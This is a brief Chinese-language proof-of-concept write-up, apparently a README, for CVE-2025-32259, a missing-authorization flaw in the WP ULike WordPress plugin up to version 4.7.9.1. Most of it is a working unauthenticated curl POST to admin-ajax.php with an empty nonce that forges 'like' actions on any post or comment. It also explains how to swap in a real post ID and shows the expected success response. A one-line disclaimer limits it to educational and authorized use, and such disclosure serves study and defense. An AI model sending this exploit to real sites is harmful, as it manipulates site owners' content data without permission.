🔬 展示 WP ULike WordPress 插件中 CVE-2025-32259 的简单 PoC。
🚨 仅供教育用途 – 未经明确授权请勿在系统上测试。
WP ULike 是一个流行的 WordPress 插件,允许用户点赞站点内容。版本 4.7.9.1 及以下存在缺少授权漏洞,允许未认证用户通过 AJAX 请求伪造“点赞”操作。
该漏洞允许未认证用户与 AJAX 端点交互,并在未经许可的情况下点赞任何内容(文章、评论等)。
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
-d "action=wp_ulike_process" \
-d "method=likeThis" \
-d "id=1" \
-d "type=post" \
-d "nonce=" \
-H "Content-Type: application/x-www-form-urlencoded"
将 id=1 替换为有效的文章 ID。
成功响应可能类似于: {"status":"success","msg":"You liked this."}